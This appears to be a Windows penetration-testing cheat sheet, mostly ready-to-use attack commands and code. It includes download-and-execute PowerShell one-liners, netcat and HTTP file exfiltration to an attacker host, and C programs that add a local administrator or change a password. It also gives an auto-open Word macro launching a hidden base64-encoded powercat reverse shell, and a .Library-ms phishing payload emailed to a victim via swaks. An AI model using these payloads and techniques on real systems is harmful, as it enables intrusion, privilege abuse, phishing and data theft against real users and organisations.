Miscellaneous
A collection of nifty tricks and hacks to make your Windows pentesting smarter, faster, and stealthier.
Downloading files in windows machine
Method 1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"
Method 2
certutil -urlcache -split -f http://192.168.1.1/exploit.exe
Method 3
iwr -uri http://192.168.1.1/Powerview.ps1 -Outfile PowerView.ps1
Method 4
iex(new-object net.webclient).downloadstring('http://192.168.1.1/Invoke-ADEnum.ps1')
Method 5
using Impacket-smb command in kali machine to create SMB server
impacket-smbserver -smb2support smb tools/
Downloading it in windows machine using copy command
copy \\192.168.1.1\smb\PowerView.ps1
Download files from windows to Kali machine
Method 1
Enable SSH in Kali Machine using command below
sudo service ssh start
Use below command in windows machine to push the file into kali
scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/destination/directory/
Method 2
use below command to start an upload server in kali machine
$ python3 -m uploadserver 8000
File upload available at /upload
Push files from windows machine
# In PowerShell 7+
Invoke-RestMethod -Uri "http://192.168.45.157:8000/upload" -Method Post -Form @{ files = Get-Item "C:\path\to\file.zip" }
Method 3
Create SMB server using Impacket-smbserver command
impacket-smbserver myshare share -smb2suppport
Push the file from windows machine using copy command
copy C:\Location\of\the\file \\IP_of_your_kali_machine\myshare
Method 4
setup listner in kali machine
nc -nvlp 4242 > Pawan_audit_20250726063755_BloodHound.zip
Download nc.exe in windows machine and use this command to push zip file .
cmd.exe /c ".\nc.exe 192.168.45.157 4242 < Pawan_audit_20250726063755_BloodHound.zip"
Cross Compilation of code in kali
Below command will help you to create a quick exe file for windows machine push and execute it
i686-w64-mingw32-gcc program.c -o exploit.exe
C-Programs to do malicious activities in windows
Prog 1 : To add user in windows machine
This will help to add user Pawan with Password 123! and add the user into Administrator Group
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user pawan 123! /add");
i = system ("net localgroup administrators pawan /add");
return 0;
}
Prog 2 : To change passowd of a user
This program will change the password of the user Pawan
#include <stdlib.h>
int main() {
int i;
i = system("net user Pawan NewPassword456!");
return 0;
}
Above programs can be used in Service Binary Hijacking , DLL Hijacking , Unquoted Service Paths etc. and can be cross compiled to create .exe file using the commands given in this section
Get reverse Shell from Macro
You can download this python scrpipt RevShellMacro.py to do the work just enter the IP address and port , The default http port is 80 to download the powercat from kali machine.
Below is the detailed method of doing the same Just in case if you want to do the hard work.
Step 1. Get the powercat command for reverse shell
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
This command downloads file powercat.ps1 from your kali machine and executes for reverseshell on port 4444
Step 2. Base64 encode your command
pwsh
$Text="IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230/powercat.ps1');powercat -c 192.168.45.230 -p 4444 -e powershell"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA
Step 3. Divide your commands into chunks using python3
Assign the command to a variable
>>> my_str = "powershell.exe -nop -w hidden -enc <base64_encoded_command>"
deciding the size of the chunk and execting it .
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
Below is the result of the above commands
└─$ python3
Python 3.13.3 (main, Apr 10 2025, 21:38:51) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> my_str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAb\
gB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGMAYQB0AC4AcAB\
zADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA\
GwA"
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
...
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"
Step 4. Put everything together in macro
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"
CreateObject("Wscript.Shell").Run Str
End Sub
Reverse Shell from Windows Library files
below steps will help to generate a windows library file (.Library-ms) for reverse shell
Step 1. Get the powercat command for reverse shell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.5:8080/powercat.ps1'); powercat -c 192.168.45.189 -p 4444 -e powershell"
This command downloads file powercat.ps1 from your kali machine and executes for reverseshell on port 4444 , Host this file on port 8080 Use this command as the name of the shortcut file that you want to create, Once double clicked and opened shortcut then it will be executed.
Step 2. Create WebDav Share
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/location_to/share/
Step 3. Library Code for connecting to share
You can use VS-Code to create config.Library-ms file
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.1.5</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Change the IP with the attacker's ip in the above code.
Step 4. Share it with the victim
sudo swaks -t victim@mail.com --from pawan.kumar@mail.com --attach @config.Library-ms --server <victim-IP>:587 --body @mail.txt --header "Subject: Important-Update" --suppress-data -ap
Above command is only possible if you have valid credential